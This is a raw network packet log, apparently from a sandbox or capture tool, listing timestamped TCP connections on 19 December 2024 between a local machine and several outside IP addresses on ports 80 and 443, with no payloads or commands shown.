                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.827399015 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.827450037 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.827450037 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.827466011 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.827492952 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.827519894 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.828285933 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.828324080 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.828341961 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.828345060 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.828380108 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.828388929 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.829015970 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.829047918 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.829063892 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.829066038 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.829086065 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.829107046 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.829947948 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.829965115 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.829988956 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.829997063 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.830004930 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.830065012 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.830079079 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.830079079 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.830867052 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.830889940 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.830910921 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.830919027 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.830961943 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.830961943 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.831965923 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.831993103 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.832010984 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.832020998 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.832041979 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.832051039 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.832874060 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.832896948 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.832916975 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.832935095 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.832963943 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.832994938 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.833780050 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.833806038 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.833822012 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.833832979 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.833862066 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.834836006 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.834858894 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.834875107 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.834912062 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.834928989 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.835695028 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.835715055 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.835762978 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.835768938 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.835783958 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.835805893 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.835833073 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.836599112 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.836630106 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.836652040 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.836654902 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.836671114 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.836688995 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.837483883 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.837508917 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.837526083 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.837538958 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.837552071 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.837569952 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.838574886 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.838592052 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.838608027 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.838620901 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.838628054 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.838634968 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.838659048 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.838671923 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.839396000 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.839413881 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.839427948 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.839461088 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.839492083 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.840456963 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.840475082 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.840498924 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.840507984 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.840523958 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.840545893 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.983736992 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.983870983 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.983889103 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.983983040 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.984201908 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.984258890 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.984507084 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.984522104 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.984555960 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.984575987 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.984945059 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.985172033 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.985187054 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.985203028 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.985228062 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.985253096 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.985673904 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.985704899 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.985717058 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.985723019 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.985749960 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.985764027 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.988512993 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.988528013 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.988588095 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.989442110 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.989465952 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.989497900 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.989514112 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.991405010 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.992275000 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.992296934 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.992314100 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.992343903 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.992383957 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.993359089 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.993376970 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.993392944 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.993423939 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.993437052 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.994187117 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.995368958 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.996227026 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.996243000 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.996275902 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.996284008 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.997046947 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.997067928 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.997117043 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.999030113 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.999088049 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.999922991 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.000000954 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.000020981 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.000058889 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.000085115 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.002716064 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.002736092 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.002752066 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.002770901 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.002784014 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.002814054 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.004713058 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.004735947 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.004790068 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.005553961 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.005575895 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.005626917 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.014067888 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.014189959 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.014261961 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.014277935 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.014317036 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.014574051 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.014590979 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.014615059 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.014626980 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.014651060 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.014671087 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.015546083 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.015835047 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.015856981 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.015891075 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.015914917 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.016282082 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.016632080 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.016648054 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.016665936 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.016679049 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.016712904 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.017560005 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.017577887 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.017595053 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.017613888 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.017640114 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.018414974 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.018434048 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.018471003 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.018496990 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.018930912 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.018948078 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.018964052 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.019000053 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.019023895 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.019870043 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.019887924 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.019905090 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.019946098 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.019968033 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.020812035 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.020828962 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.020884037 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.021243095 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.021260023 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.021277905 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.021297932 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.021327019 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.022440910 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.022458076 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.022475958 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.022499084 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.022527933 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.023017883 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.023036003 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.023051977 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.023067951 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.023070097 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.023098946 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.023122072 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.805480957 CET44349762104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.805617094 CET49762443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.812922955 CET49762443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.812946081 CET44349762104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.813256025 CET44349762104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.816986084 CET49762443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.817138910 CET49762443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:39.817168951 CET44349762104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:40.048981905 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:40.049377918 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:40.170047998 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:40.170337915 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:40.170454025 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:40.186374903 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:40.279274940 CET44349761172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:40.306330919 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:40.309694052 CET49761443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:40.309726000 CET44349761172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:40.310416937 CET44349761172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:40.311103106 CET49761443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:40.311212063 CET44349761172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:40.365705967 CET49761443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:40.619632006 CET44349762104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:40.619726896 CET44349762104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:40.619801998 CET49762443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:40.620600939 CET49762443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:40.620624065 CET44349762104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:40.947616100 CET49767443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:40.947674990 CET44349767104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:40.947736025 CET49767443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:40.948060989 CET49767443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:40.948076010 CET44349767104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:41.415024042 CET4974180192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:41.415340900 CET4976880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:41.541003942 CET8049768185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:41.541018009 CET8049741185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:41.541096926 CET4974180192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:41.541168928 CET4976880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:41.541574955 CET4976880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:41.565305948 CET49769443192.168.2.498.85.100.80
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:41.565341949 CET4434976998.85.100.80192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:41.565412998 CET49769443192.168.2.498.85.100.80
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:41.580265045 CET49769443192.168.2.498.85.100.80
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:41.580279112 CET4434976998.85.100.80192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:41.661163092 CET8049768185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:42.067763090 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:42.067878008 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:42.149813890 CET49761443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:42.157099962 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:42.157207012 CET4976580192.168.2.4185.215.113.206
